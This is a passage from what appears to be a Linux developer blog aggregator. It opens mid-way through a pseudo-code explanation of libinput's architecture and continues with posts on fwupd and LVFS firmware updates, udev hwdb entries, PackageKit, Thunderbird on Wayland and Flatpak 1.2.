        elif 'ID_INPUT_SWITCH' in self.udev_device.properties:
            self.interface = EvdevSwitch()
        ...
        else:
            self.interface = EvdevFallback()


class EvdevInterface:
    def dispatch_one_event(self, event):
        pass


class EvdevTouchpad(EvdevInterface):
    def dispatch_one_event(self, event):
        ...


class EvdevTablet(EvdevInterface):
    def dispatch_one_event(self, event):
        ...


class EvdevSwitch(EvdevInterface):
    def dispatch_one_event(self, event):
        ...


class EvdevFallback(EvdevInterface):
    def dispatch_one_event(self, event):
        ...
Our evdev device is actually a subclass (well, C, *handwave*) of the public device and its main function is "read things off the device node". And it passes that on to a magical interface. Other than that, it's a collection of generic functions that apply to all devices. The interfaces are where most of the real work is done.

The interface is decided on by the udev type and is where the device-specifics happen. The touchpad interface deals with touchpads, the tablet and switch interfaces with those devices, and the fallback interface is the one for mice, keyboards and touch devices (i.e. the simple devices).

Each interface has very device-specific event processing and can be compared to the Xorg synaptics vs wacom vs evdev drivers. If you are fixing a touchpad bug, chances are you only need to care about the touchpad interface.

The device quirks used above are another simple block:


class Quirks:
    def __init__(self):
        self.read_all_ini_files_from_directory('$PREFIX/share/libinput')

    def has_quirk(device, quirk):
        for file in self.quirks:
            if quirk.has_match(device.name) or \
               quirk.has_match(device.usbid) or \
               quirk.has_match(device.dmi):
                return True
        return False

    def get_quirk_value(device, quirk):
        if not self.has_quirk(device, quirk):
            return None

        quirk = self.lookup_quirk(device, quirk)
        if quirk.type == "boolean":
            return bool(quirk.value)
        if quirk.type == "string":
            return str(quirk.value)
        ...
A system that reads a bunch of .ini files, caches them and returns their value on demand. Those quirks are then used to adjust device behaviour at runtime.

The next building block is the "filter" code, which is the word we use for pointer acceleration. Here too we have a two-layer abstraction with an interface.


class Filter:
    def dispatch(self, x, y):
        # converts device-unit x/y into normalized units
        return self.interface.dispatch(x, y)

    # the 'accel speed' configuration value
    def set_speed(self, speed):
        return self.interface.set_speed(speed)

    # the 'accel speed' configuration value
    def get_speed(self):
        return self.speed

    ...


class FilterInterface:
    def dispatch(self, x, y):
        pass


class FilterInterfaceTouchpad:
    def dispatch(self, x, y):
        ...


class FilterInterfaceTrackpoint:
    def dispatch(self, x, y):
        ...


class FilterInterfaceMouse:
    def dispatch(self, x, y):
        self.history.push((x, y))
        v = self.calculate_velocity()
        f = self.calculate_factor(v)
        return (x * f, y * f)

    def calculate_velocity(self):
        for delta in self.history:
            total += delta
        velocity = total / timestamp  # as illustration only

    def calculate_factor(self, v):
        # this is where the interesting bit happens,
        # let's assume we have some magic function
        f = v * 1234/5678
        return f
So libinput calls filter_dispatch on whatever filter is configured and passes the result on to the caller. The setup of those filters is handled in the respective evdev interface, similar to this:

class EvdevFallback:
    ...
    def init_accel(self):
        if self.udev_type == 'ID_INPUT_TRACKPOINT':
            self.filter = FilterInterfaceTrackpoint()
        elif self.udev_type == 'ID_INPUT_TOUCHPAD':
            self.filter = FilterInterfaceTouchpad()
        ...
The advantage of this system is twofold. First, the main libinput code only needs one place where we really care about which acceleration method we have. And second, the acceleration code can be compiled separately for analysis and to generate pretty graphs. See the pointer acceleration docs. Oh, and it also allows us to easily have per-device pointer acceleration methods.

Finally, we have one more building block - configuration options. They're a bit different in that they're all similar-ish but only to make switching from one to the next a bit easier.


class DeviceConfigTap:
    def set_enabled(self, enabled):
        self._enabled = enabled

    def get_enabled(self):
        return self._enabled

    def get_default(self):
        return False

class DeviceConfigCalibration:
    def set_matrix(self, matrix):
        self._matrix = matrix

    def get_matrix(self):
        return self._matrix

    def get_default(self):
        return [1, 0, 0, 0, 1, 0, 0, 0, 1]
And then the devices that need one of those slot them into the right pointer in their structs:

class EvdevFallback:
    ...
    def init_calibration(self):
        self.config_calibration = DeviceConfigCalibration()
        ...

    def handle_touch(self, x, y):
        if self.config_calibration is not None:
            matrix = self.config_calibration.get_matrix()

            x, y = matrix.multiply(x, y)
            self.context._notify_pointer_abs(x, y)

And that's basically it, those are the building blocks libinput has. The rest is detail. Lots of it, but if you understand the architecture outline above, you're most of the way there in diving into the details.

libinput and location-based touch arbitration

Posted by Peter Hutterer on March 15, 2019 05:58 AM

One of the features in the soon-to-be-released libinput 1.13 is location-based touch arbitration. Touch arbitration is the process of discarding touch input on a tablet device while a pen is in proximity. Historically, this was provided by the kernel wacom driver but libinput has had userspace touch arbitration for quite a while now, allowing for touch arbitration where the tablet and the touchscreen part are handled by different kernel drivers.

Basic touch arbitration is relatively simple: when a pen goes into proximity, all touches are ignored. When the pen goes out of proximity, new touches are handled again. There are some extra details (esp. where the kernel handles arbitration too) but let's ignore those for now.

With libinput 1.13 and in preparation for the Dell Canvas Dial Totem, the touch arbitration can now be limited to a portion of the screen only. On the totem (future patches, not yet merged) that portion is a square slightly larger than the tool itself. On normal tablets, that portion is a rectangle, sized so that it should encompass the user's hand and the area around the pen, but not much more. This enables users to use both the pen and touch input at the same time, providing for bimanual interaction (where the GUI itself supports it of course). We use the tilt information of the pen (where available) to guess where the user's hand will be to adjust the rectangle position.
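As a purely conceptual illustration (this is not libinput's actual code, and all the sizes and offsets are invented), the core of the check is just "is this touch inside an exclusion rectangle placed around the pen", with the rectangle shifted towards where the tilt suggests the hand rests:

class Rect:
    def __init__(self, x, y, width, height):  # all in mm
        self.x, self.y, self.width, self.height = x, y, width, height

    def contains(self, px, py):
        return (self.x <= px <= self.x + self.width and
                self.y <= py <= self.y + self.height)

def arbitration_rect(pen_x, pen_y, tilt_x, size=(70.0, 50.0)):
    """Hand-sized rectangle around the pen, shifted towards the tilt side."""
    w, h = size
    offset = w * 0.3 if tilt_x >= 0 else -w * 0.3
    return Rect(pen_x - w / 2 + offset, pen_y - h / 4, w, h)

def discard_touch(touch_x, touch_y, pen_in_proximity, rect):
    return pen_in_proximity and rect.contains(touch_x, touch_y)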

There are some heuristics involved and I'm not sure we got all of them right so I encourage you to give it a try and file an issue where it doesn't behave as expected.

A fwupd client side certificate

Posted by Richard Hughes on March 12, 2019 03:00 PM

In the soon-to-be-released fwupd 1.2.6 there’s a new feature that I wanted to talk about here, if nothing else to be the documentation when people find these files and wonder what they are. The fwupd daemon now creates a PKCS-7 client self-signed certificate at startup (if GnuTLS is enabled and new enough) – which creates the root-readable /var/lib/fwupd/pki/secret.key and world-readable /var/lib/fwupd/pki/client.pem files.

These certificates are used to sign text data sent to a remote server. At the moment, this is only useful for vendors who also have accounts on the LVFS, so that when someone in their QA team tests the firmware update on real hardware, they can upload the firmware report with the extra --sign argument to sign the JSON blob with the certificate. This allows the LVFS to be sure the report upload comes from the vendor themselves, and will in future allow the trusted so-called attestation DeviceChecksums a.k.a. the PCR0 to be set automatically from this report. Of course, the LVFS user needs to upload the certificate to the LVFS to make this work, although I’ve written this functionality and am just waiting for someone to review it.

It’ll take some time for the new fwupd to get included in all the major distributions, but when practical I’ll add instructions for companies using the LVFS to use this feature. I’m hoping that by making it easier to securely set the PCR0 more devices will have the attestation metadata needed to verify if the machine is indeed running the correct firmware and secure.

Of course, fwupd doesn’t care if the certificate is self-signed or is issued from a corporate certificate signing request. The files in /var/lib/fwupd/pki/ can be set to whatever policy is in place. We can also use this self-signed certificate for any future agent check-in which we might need for the enterprise use cases. It allows us to send data from the client to a remote server and prove who the client is. Comments welcome.
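fwupd does the signing itself with GnuTLS, but just to illustrate the shape of the operation, here is a rough equivalent using the Python cryptography library to produce a detached PKCS#7 signature over a report blob with the key and certificate described above (this is an illustration, not the code fwupdmgr runs, and report.json is a stand-in for the real report):

from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.serialization import pkcs7

with open("/var/lib/fwupd/pki/client.pem", "rb") as f:
    cert = x509.load_pem_x509_certificate(f.read())
with open("/var/lib/fwupd/pki/secret.key", "rb") as f:  # root-readable
    key = serialization.load_pem_private_key(f.read(), password=None)

with open("report.json", "rb") as f:  # stand-in for the uploaded report
    report = f.read()

signature = (
    pkcs7.PKCS7SignatureBuilder()
    .set_data(report)
    .add_signer(cert, key, hashes.SHA256())
    .sign(serialization.Encoding.PEM, [pkcs7.PKCS7Options.DetachedSignature])
)
print(signature.decode())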

Videos and Books in GNOME 3.32

Posted by Bastien Nocera on March 08, 2019 07:00 PM
GNOME 3.32 will very soon be released, so I thought I'd look back on a few of the things that happened with some of our content applications.

Videos
First, many thanks to Marta Bogdanowicz, Baptiste Mille-Mathias, Ekaterina Gerasimova and Andre Klapper who toiled away at updating Videos' user documentation since 2012, when it was still called “Totem”, and then again in 2014 when “Videos” appeared.

The other major change is that Videos is available, fully featured, from Flathub. It should play your Windows Movie Maker films, your circular wafers of polycarbonate plastic and aluminium, and your Devolver indie films. No more hunting codecs or libraries!

In the process, we also fixed a large number of outstanding issues, such as accommodating the app menu's planned disappearance, moving the audio/video properties tab to nautilus proper, making the thumbnailer available as an independent module, making the MPRIS plugin work better, and loads, loads more.


Download on Flathub

Books

As Documents was removed from the core release, we felt it was time for Books to become independent. And rather than creating a new package inside a distribution, the Flathub version was updated. We also fixed a bunch of bugs, so that's cool :)
Download on Flathub

Weather

I didn't work directly on Weather, but I made some changes to libgweather which means it should be easier to contribute to its location database.

Adding new cities doesn't require adding a weather station by hand; it will just pick the closest one. Weather stations also don't need to be attached to cities any more; they were usually attached to villages, sometimes hamlets!

The automatic tests are also more stringent, and test for more things, which should hopefully mean fewer bugs.

And even more Flatpaks

On Flathub, you'll also find some applications I packaged up in the last 6 months. First is Teo, a Thomson emulator; GBE+, a Game Boy emulator focused on accessories emulation; and a way to run your old Flash games offline.

Making the LVFS and fwupd work in the enterprise

Posted by Richard Hughes on March 04, 2019 04:24 PM

I’ve spent some time over the weekend thinking about how firmware updates should work when you’re an enterprise, i.e. when you’re responsible for more than about 100 broadly similar computers. Some companies using fwupd right now are managing over 100,000 devices (!) using a variety of non-awesome workarounds. So far we’ve not had a very good story on how to make firmware updates for corporate or IoT “just work” as we’ve been concentrating on the desktop use-cases.

We’ve started working on some functionality in fwupd to install an optional “agent” that reports the versions of firmware installed to a central internal web service daily, so that the site admin can see what computers are not up-to-date with the latest firmware updates. I’d expect the admin could also approve updates there after in-house QA testing, and also rate-limit the flow of updates to hardware of the same type. The reference web app would visually look like some kind of dashboard, although I’d be happy to also plug this information into existing system management systems like Lenovo XClarity or even Red Hat Satellite. The deliverable here would be to provide the information and the mechanism that can be used to implement whatever policy the management console defines.

This stuff isn’t particularly relevant to the average Linux user, and enabling this special “enterprise mode” would involve spinning up a web app on the internal network, manually enabling a systemd timer on all clients in the enterprise and also perhaps setting up a LVFS mirror. The console certainly isn’t the kind of thing you’d run on the Internet or be provided by the LVFS.

If this sounds interesting, I’d love to hear some comments, feedback and wish list items. We’re at the pre-alpha stage right now and are just prototyping some toy code. Thanks!

Making ATA updates just work

Posted by Richard Hughes on February 27, 2019 04:56 PM

The fwupd project has supported updating the microcode on ATA devices for about a month, and StarLabs is shipping firmware on the LVFS already. More are coming, but as part of the end-to-end testing with various deliberately-unnamed storage vendors we hit a thorny issue.

Most drives require the firmware updater to use the so-called 0xE mode, more helpfully called ATA_SUBCMD_MICROCODE_DOWNLOAD_CHUNKS in fwupd. This command transfers chunks of firmware to the device, and then the ATA hardware waits for a COMRESET before switching to the new firmware version. On most drives you can also use 0x3 mode which downloads the chunks and switches to the new firmware straight away using ATA RESET. As in, your drive currently providing your root filesystem disconnects from your running system and then reconnects with the new firmware version running. The kernel should be okay with that (and seems to work for me), but various people have advised us it would be a good way to cause accidental Bad Things™ to happen, which certainly seems plausible. Needless to say, we defaulted to the safe 0xE mode in fwupd 1.2.4 and thus require the user to reboot to switch to the new firmware version.

The issue we found is that about half of the ATA drive vendors require the drive to receive a COMRESET before switching to the new firmware. Depending on your main system firmware (and seemingly, the phase of the moon) you might only get a COMRESET when the device is initially powered on, rather than during reset. This means we’d have to tell the user to shutdown and then manually restart their system rather than just doing a system restart, which means various fwupd front ends like GNOME Software and KDE discover would need updating with new strings and code. This isn’t exactly trivial for enterprise distros like RHEL, and fwupd doesn’t know the capabilities of the front-end so can’t do anything sensible like hold back the update.

Additionally, the failure mode of installing a firmware update and then just restarting rather than shutting down would be that the firmware version would be unchanged on the next boot, and fwupd would recognize this and mark the update as failed. The user would then also be prompted to update the firmware on the device that they thought they just updated. As my boss would say, “disappointing”.

Complexity to the rescue! There is one extra little-used mode in the ATA specification, called 0xF. This command causes the drive to immediately switch to the new firmware version, which as we’ve previously lamented might cause data loss. We can, however, use this new command on shutdown when the filesystems have all been remounted read only. In fwupd git master (which is what will become version 1.2.6) we actually install a /usr/lib/systemd/system-shutdown/fwupd.shutdown script which checks the history database, and activates the new firmware if there is any activation required. This way it’ll always come back with the new firmware version when the user restarts, regardless of how the storage vendor interpreted the ATA specification.
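The shipped hook is a small script, but the logic is easy to sketch; something along these lines, assuming a fwupdtool activate command is available on the client (treat the exact command name as an assumption):

import subprocess

def activate_pending_firmware():
    """Late-shutdown hook sketch: ask fwupd to switch any devices with
    staged firmware over to the new version while filesystems are read-only."""
    try:
        # assumed CLI verb; nothing happens if no device is pending activation
        subprocess.run(["fwupdtool", "activate"], check=True, timeout=60)
    except subprocess.CalledProcessError:
        pass  # nothing pending, or activation failed; shutdown continues anyway

if __name__ == "__main__":
    activate_pending_firmware()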

I guess I should also thank Mario Limonciello and the storage team at Dell for all the help with this. We’ll hopefully have some more good news to share soon.

Lenovo ThinkCentre joins the LVFS

Posted by Richard Hughes on February 26, 2019 08:06 AM

Lenovo ThinkPad and ThinkStation have already been using the LVFS for some time, with many models supported from each group. Now the first firmware for the ThinkCentre line of hardware has appeared. ThinkCentre machines are often found in the enterprise, often tucked neatly behind other hardware or under counter tops, working away for years without problems. With LVFS support, site administrators can now update firmware on machines either locally or using ssh. At the moment only the M625q model is listed as supported on the LVFS, but other models are in the pipeline and will appear when ready.

It’s been a good month for the LVFS, 6 new devices were added in the last month, and we celebrated the numerically significant 5 million firmware downloads. The move to the Linux Foundation is going well, and we’ll hopefully be moving the staging instance from a little VM to a proper cloud deployment, providing the scalability and uptime requirements we need for critical infrastructure like this. If all goes to plan the main instance will move after a few months of testing.

PackageKit is dead, long live, well, something else

Posted by Richard Hughes on February 14, 2019 06:01 PM

It’s probably no surprise to many of you that PackageKit has been in maintenance mode for quite some time. Although started over ten years ago (!) it’s not really had active maintenance since about 2014. Of course, I’ve still been merging PRs and have been slinging tarballs over the wall every few months, but nothing new was happening with the project, and I’ve worked on many other things since.

I think it’s useful to do a little retrospective. PackageKit was conceived as an abstraction layer over about a dozen different package management frameworks. Initially it succeeded, with a lot of front-end UIs being written for the PackageKit API, making the Linux desktop a much nicer place for many years. Over the years, most package managers have withered and died, and for the desktop at least really only two remain, .rpm and .deb. The former is handled by the dnf PackageKit backend, and the latter by aptcc.

Canonical seems to be going all in on Snaps, and I don’t personally think of .deb files as first class citizens on Ubuntu any more – which is no bad thing. Snaps and Flatpaks are better than packages for desktop software in almost every way. Fedora is concentrating on Modularity and is joining with most of the other distros with a shared Flatpak and Flathub future and seems to be thriving because of it. Of course, I’m leaving out a lot of other distros, but from a statistics point of view they’re unfortunately not terribly relevant. Arch users are important, but they’re also installing primarily on the command line, not using an abstraction layer or GUI. Fedora is also marching towards an immutable base image using rpm-ostree, containers and flatpaks, and then PackageKit isn’t only not required, but doesn’t actually get installed at all in Fedora Silverblue.

GNOME Software and the various KDE software centers already have an abstraction in the session, which they kind of have to, to support per-user flatpak applications and per-user pet containers like Fedora Toolbox. I’ve also been talking to people in the Cockpit project and they’re in the same boat, and basically agree that having a shared system API to get the installed package list isn’t actually as useful as it used to be. Of course, we’ll need to support mutable systems for a long time (RHEL!) and so something has to provide a D-Bus interface to provide that. I’m not sure whether that should be dnfdaemon providing a PackageKit-compatible API, or it should just implement a super-simple interface that’s not using an API design from the last decade. At least from a gnome-software point of view it would just be one more plugin, like we have a plugin for Flatpak, a plugin for Snap, and a plugin for PackageKit.

Comments welcome.

Using fwupd and updating firmware without using the LVFS

Posted by Richard Hughes on February 14, 2019 12:43 PM

The LVFS is a webservice designed to allow system OEMs and ODMs to upload firmware easily, and for it to be distributed securely to tens of millions of end users. For some people, this simply does not work for good business reasons:

  • They don’t trust me, fwupd.org, GPG, certain OEMs or the CDN we use
  • They don’t want thousands of computers on an internal network downloading all the files over and over again
  • The internal secure network has no internet connectivity

For these cases there are a few different ways to keep your hardware updated, in order of simplicity:

Download just the files you need manually

Download the .cab files you found for your hardware and then install them on the target hardware via Ansible or Puppet using fwupdmgr install foo.cab — you can use fwupdmgr get-devices to get the existing firmware versions of all hardware. If someone wants to write the patch to add JSON/XML export to fwupdmgr that would be a very welcome thing indeed.
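
If you end up scripting this yourself instead of (or inside) Ansible or Puppet, a minimal sketch of the idea might look like the following; the directory path is just an example location, and the script simply calls fwupdmgr for every cabinet archive it finds:

#!/usr/bin/python3
# Minimal sketch: install all downloaded .cab files with fwupdmgr.
# /var/cache/firmware-cabs is an example location, not a fwupd default.
import glob
import subprocess

for fn in sorted(glob.glob("/var/cache/firmware-cabs/*.cab")):
    print("Installing {}".format(fn))
    # check=False: archives that don't match any device will just fail,
    # and we carry on with the next one
    subprocess.run(["fwupdmgr", "install", fn], check=False)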

Download and deploy firmware as part of an immutable image

If you’re shipping an image, you can just dump the .cab files into a directory in the deployment along with something like /etc/fwupd/remotes.d/immutable.conf (only on fwupd >= 1.2.3):

[fwupd Remote]
Enabled=false
Title=Vendor (Automatic)
Keyring=none
MetadataURI=file:///usr/share/fwupd/remotes.d/vendor/firmware

Then once you disable the LVFS, running fwupdmgr or fwupdtool will use only the cabinet archives you deploy in your immutable image (or even from an .rpm for that matter). Of course, you’re deploying a larger image because you might have several firmware files included, but this is how Google ChromeOS is using fwupd.

Sync all the public firmware from the LVFS to a local directory

You can use Pulp to mirror the entire contents of the LVFS (not private or embargoed firmware, for obvious reasons). Create a repo pointing to PULP_MANIFEST and then sync that on a regular basis to download the metadata and firmware. The Pulp documentation can explain how to set all this up. Make sure the local files are available from a webserver in your private network using SSL.

Then, disable the LVFS by deleting/modifying lvfs.conf and then create a myprivateserver.conf file in the clients’ /etc/fwupd/remotes.d:

[fwupd Remote]
Enabled=true
Type=download
Keyring=gpg
MetadataURI=https://my.private.server/mirror/firmware.xml.gz
FirmwareBaseURI=https://my.private.server/mirror

Export a share to all clients

Again, use Pulp to create a big directory holding all the firmware (currently ~10GB), and keep it synced. This time create an NFS or Samba share and export it to clients. Map the folder on clients, and then create a myprivateshare.conf file in /etc/fwupd/remotes.d:

[fwupd Remote]
Enabled=false
Title=Vendor
Keyring=none
MetadataURI=file:///mnt/myprivateshare/fwupd/remotes.d/firmware.xml.gz
FirmwareBaseURI=file:///mnt/myprivateshare/fwupd/remotes.d

Create your own LVFS instance

The LVFS is a free software Python 3 Flask application and can be set up internally, or even externally for that matter. You have to configure much more this way, including things like generating your own GPG keys, uploading your own firmware and setting up users and groups on the server. Doing all this has a few advantages, namely:

  • You can upload your own private firmware and QA it, only pushing it to stable when ready
  • You don’t ship firmware which you didn’t upload
  • You can control the staged deployment, e.g. only allowing the same update to be deployed to 1000 servers per day
  • You can see failure reports from clients, to verify if the deployment is going well
  • You can see nice graphs about how many updates are being deployed across your organisation

I’m hoping to make the satellite deployment LVFS use cases more concrete, and hopefully add some code to the LVFS to make this easier, although it’s not currently required for any Red Hat customer. Certainly a “setup wizard” would make setting up the LVFS much easier than obscure commands on the console.

Comments welcome.

Adding entries to the udev hwdb

Posted by Peter Hutterer on February 14, 2019 01:40 AM

In this blog post, I'll explain how to update systemd's hwdb for a new device-specific entry. I'll focus on input devices, as usual.

What is the hwdb and why do I need to update it?

The hwdb is a binary database sitting at /etc/udev/hwdb.bin and /usr/lib/udev/hwdb.bin. It is usually used to apply udev properties to specific devices; those properties are then picked up by other processes (udev builtins, libinput, ...) to apply device-specific behaviours. So you'll need to update the hwdb if you need a specific behaviour from the device.

One of the use-cases I commonly deal with is that some touchpad announces wrong axis ranges or resolutions. With the correct hwdb entry (see the example later) udev can correct these at device initialisation time and every process sees the right axis ranges.

The database is compiled from the various .hwdb files you have sitting on your system, usually in /etc/udev/hwdb.d and /usr/lib/udev/hwdb.d. The terser format of the hwdb files makes them easier to update than, say, writing a udev rule to set those properties.

The full process goes something like this:

  • The various .hwdb files are installed or modified
  • The hwdb.bin file is generated from the .hwdb files
  • A udev rule triggers the udev hwdb builtin. If a match occurs, the builtin prints the to-be properties, and udev captures the output and applies it as udev properties to the device
  • Some other process (often a different udev builtin) reads the udev property value and does something.

On its own, though, the hwdb is merely a lookup tool; it does not modify devices. Think of it as a virtual filing cabinet: something will need to look at it, otherwise it's just dead weight.

An example of such a udev rule, from 60-evdev.rules:


IMPORT{builtin}="hwdb --subsystem=input --lookup-prefix=evdev:", \
RUN{builtin}+="keyboard", GOTO="evdev_end"

The IMPORT statement translates as "look up the hwdb, import the properties". The RUN statement runs the "keyboard" builtin which may change the device based on the various udev properties now set. The GOTO statement skips the rest of the file.

So again, on its own the hwdb doesn't do anything; it merely prints to-be udev properties to stdout, udev captures those and applies them to the device. And then those properties need to be processed by some other process to actually apply changes.

hwdb file format

The basic format of each hwdb file contains two types of entries: match lines and property assignments (indented by one space). The match line defines which device it is applied to.

For example, take this entry from 60-evdev.hwdb:


# Lenovo X230 series
evdev:name:SynPS/2 Synaptics TouchPad:dmi:*svnLENOVO*:pn*ThinkPad*X230*
EVDEV_ABS_01=::100
EVDEV_ABS_36=::100

The match line is the one starting with "evdev"; the other two lines are property assignments. Property values are strings; any interpretation to numeric values or others is to be done in the process that requires those properties. Noteworthy here: the hwdb can overwrite previously set properties, but it cannot unset them.

The match line is not specified by the hwdb beyond "it's a glob". The format to use is defined by the udev rule that invokes the hwdb builtin. Usually the format is:


someprefix:search criteria:
For example, the udev rule that applies for the match above is this one in 60-evdev.rules:

KERNELS=="input*", \
IMPORT{builtin}="hwdb 'evdev:name:$attr{name}:$attr{[dmi/id]modalias}'", \
RUN{builtin}+="keyboard", GOTO="evdev_end"
What does this rule do? $attr entries get filled in by udev with the sysfs attributes. So on your local device, the actual lookup key will end up looking roughly like this:

evdev:name:Some Device Name:dmi:bvnWhatever:bvR112355:bd02/01/2018:...
If that string matches the glob from the hwdb, you have a match.

Attentive readers will have noticed that the two entries from 60-evdev.rules I posted here differ. You can have multiple match formats in the same hwdb file. The hwdb doesn't care; it's just a matching system.

We keep the hwdb file names matching the udev rules names for ease of maintenance, so 60-evdev.rules keeps its hwdb entries in 60-evdev.hwdb and so on. But this is just for us puny humans; the hwdb will parse all files it finds into one database. If you have a hwdb entry in my-local-overrides.hwdb it will be matched. The file-specific prefixes are just there to not accidentally match against an unrelated entry.

Applying hwdb updates

The hwdb is a compiled format, so the first thing to do after any changes is to run


$ systemd-hwdb update
This command compiles the files down to the binary hwdb that is actually used by udev. Without that update, none of your changes will take effect.

The second thing is: you need to trigger the udev rules for the device you want to modify. Either you do this by physically unplugging and re-plugging the device or by running


$ udevadm trigger
or, better, trigger only the device you care about to avoid accidental side-effects:

$ udevadm trigger /sys/class/input/eventXYZ
In case you also modified the udev rules you should re-load those too. So the full quartet of commands after a hwdb update is:

$ systemd-hwdb update
$ udevadm control --reload-rules
$ udevadm trigger
$ udevadm info /sys/class/input/eventXYZ
That udevadm info command lists all assigned properties; these should now include the modified entries.

Adding new entries

Now let's get down to what you actually want to do, adding a new entry to the hwdb. And this is where it also gets tricky to have a generic guide, because every hwdb file has its own custom match rules.

The best approach is to open the .hwdb files and the matching .rules file and figure out what the match formats are and which one is best. For USB devices there's usually a match format that uses the vendor and product ID. For built-in devices like touchpads and keyboards there's usually a dmi-based match format (see /sys/class/dmi/id/modalias). In most cases, you can just take an existing entry and copy and modify it.

My recommendation is: add an extra property that makes it easy to verify the new entry is applied. For example do this:


# Lenovo X230 series
evdev:name:SynPS/2 Synaptics TouchPad:dmi:*svnLENOVO*:pn*ThinkPad*X230*
EVDEV_ABS_01=::100
EVDEV_ABS_36=::100
FOO=1
Now run the update commands from above. If FOO=1 doesn't show up, then you know it's the hwdb entry that's not yet correct. If FOO=1 does show up in the udevadm info output, then you know the hwdb matches correctly and any issues will be in the next layer.

Increase the value with every change so you can tell whether the most recent change is applied. And before you submit a pull request, remove the FOO entry.

Oh, and once it applies correctly, I recommend restarting the system to make sure everything is in order on a freshly booted system.

Troubleshooting

The reason for adding hwdb entries is always because we want the system to handle a device in a custom way. But it's hard to figure out what's wrong when something doesn't work (though 90% of the time it's a typo in the hwdb match).

In almost all cases, the debugging sequence is the following:

  • does the FOO property show up?
  • did you run systemd-hwdb update?
  • did you run udevadm trigger?
  • did you restart the process that requires the new udev property?
  • is that process new enough to have support for that property?
If the answer to all these is "yes" and it still doesn't work, you may have found a bug. But 99% of the time, at least one of those is a sound "no. oops.".

Your hwdb match may run into issues with some 'special' characters. If your device has e.g. an ® in its device name (some Microsoft devices have this), a bug in systemd caused the match to fail. That bug is fixed now but until it's available in your distribution, replace the character with an asterisk ('*') in your match line.

Greybeards who have been around since before 2014 (systemd v219) may remember a different tool to update the hwdb: udevadm hwdb --update. This tool still exists, but it does not have the exact same behaviour as systemd-hwdb update. I won't go into details but the hwdb generated by the udevadm tool can provide unexpected matches if you have multiple matches with globs for the same device. A more generic glob can take precedence over a specific glob and so on. It's a rare and niche case and fixed since systemd v233 but the udevadm behaviour remained the same for backwards-compatibility.

Happy updating and don't forget to add Database Administrator to your CV when your PR gets merged.

Thunderbird for Wayland

Posted by Martin Stransky on February 08, 2019 09:09 AM

While Firefox is already built with Wayland by Mozilla (thx. Mike Hommey) and Fedora also ships Firefox Wayland, Thunderbird users (me included) are missing it. But why care about it anyway?

Wayland compositors have one great feature (at least for me): they handle screen scaling independently of the actual hardware. So I can set a 200% desktop scale on a semi-HiDPI monitor (4K & 28″) and all Wayland applications work immediately at that scale without font adjustments/various DPI tweaks/etc.

So here comes Thunderbird with a Wayland backend. I originally did the package for my personal needs, but you can have it too 🙂 Just get it from the Fedora repos with

dnf install thunderbird-wayland

You’ll receive a ‘Thunderbird on Wayland’ application entry which can be registered as the default Mail application at

Settings -> Details -> Default Applications

Some background info: the recent stable Thunderbird (thunderbird-60.5.0) is based on the Firefox ESR60 line and I backported the related parts from the latest stable Firefox 65. Some code couldn’t be ported and there are still issues with the Wayland backend (misplaced menus on multi-monitor setups, for instance) so use the bird at your own risk.


Please welcome HP to the LVFS

Posted by Richard Hughes on February 01, 2019 08:50 PM

As some of you have successfully guessed, HP Inc have been testing the LVFS for a few months now. There are now a few devices by HP available in the stable metadata and there are many more devices planned. If you’ve got a Z2, Z6, Z8, Z440, Z640 or Z840 system then you might want to check for an update in the GNOME Software updates panel or using fwupdmgr update in the terminal. There are quite a few updates with important fixes for various CVEs. I don’t know how many different models of HP hardware they are planning to support, or the order in which they will be uploaded, but I’m happy with the progress.

With the addition of HP, the LVFS now has most major OEMs uploading firmware. There are a few exceptions, but even seemingly-unlikely companies like Microsoft are still interested in shipping firmware on the LVFS in the future. If you want to know more about joining the LVFS, please just send me an email.

ATA/ATAPI Support in fwupd

Posted by Richard Hughes on January 30, 2019 08:17 AM

A few vendors have been testing the NVMe firmware update code, and so far so good; soon we should have three more storage vendors moving firmware to stable. A couple of vendors also wanted to use the hdparm binary to update SATA hardware that’s not using the NVMe specification. A quick recap of the difference:

  • NVMe: Faster, more expensive controller, one cut-out in the M.2 PCB header
  • SATA: Slower, less expensive to implement, standard SATA or PATA connector, or two cut-outs in the M.2 PCB header

I’ve just merged a plugin developed with the donation of hardware and support of Star Labs. Any ATA-compatible drive (even DVD drives) supporting ATA_OP_DOWNLOAD_MICROCODE should be updatable using this new plugin, but you need to verify the TransferMode (e.g. 0x3, 0x7 or 0xe) before attempting an update to prevent data loss. Rather than calling into hdparm and screenscraping the output, we actually set up the sg_io_hdr_t structure and CDB buffer in the fwupd plugin to ensure it always works reliably without any additional dependencies. We only use two ATA commands and we can share a lot of the infrastructure with other plugins. For nearly all protocols, on nearly all devices, updating firmware is really a very similar affair.

There should soon be firmware on the LVFS that updates the StarDrive in the Star Lite laptop. I opened up the Star Lite today to swap the M.2 SSD to one with an old version and was amazed to find that it’s 80% battery inside; it reminded me of the inside of an iPad. Really impressive engineering considering the performance.

If any vendor is interested in deploying updates on the LVFS using the new ata plugin please let me know. Comments welcome.

Whats new in Flatpak 1.2

Posted by Matthias Clasen on January 28, 2019 06:21 PM

Time flies: Flatpak 1.0 was released four months ago. Today we released the next major version, Flatpak 1.2. Let’s take a look at what’s new.

New User Experience

A lot of effort since 1.0 has gone into improving the commandline user experience. This includes everything from better progress reporting to search and completion.

I’ve already written a detailed post about this aspect of the Flatpak 1.2 work, so I’m not going to say much more about it here.

Life-cycle control

1.2 includes new commands which make it easier to manage running Flatpaks.

Like other containers, Flatpaks are just regular processes, so traditional tools like ps and kill can be used with them. But there is often a bit more to a Flatpak sandbox than just a single process – there’s a babysitter and D-Bus proxies, and it can be a little daunting to identify the right process to kill in a process listing.

To make this easy and obvious, we’ve added two new commands, flatpak ps and flatpak kill. For now, flatpak ps just lists basic information, but it is the natural place to show e.g. resource consumption in the future.

This functionality is available to other Flatpak front ends as well, in the form of the FlatpakInstance API in libflatpak.
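
For front ends written in Python the same information should be reachable through GObject introspection; here is a rough sketch, assuming the FlatpakInstance API is exposed as Flatpak.Instance and that the method names mirror the C API (flatpak_instance_get_all() and friends) — check against your libflatpak version:

#!/usr/bin/python3
# Rough sketch: list running Flatpak instances via libflatpak.
# The GI namespace and method names are assumed to mirror the C API
# (flatpak_instance_get_all, _get_app, _get_pid).
import gi
gi.require_version("Flatpak", "1.0")
from gi.repository import Flatpak

for instance in Flatpak.Instance.get_all():
    print(instance.get_app(), instance.get_pid())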

Logging

Installing software is serious business, and it is well worth keeping a record of changes over time.

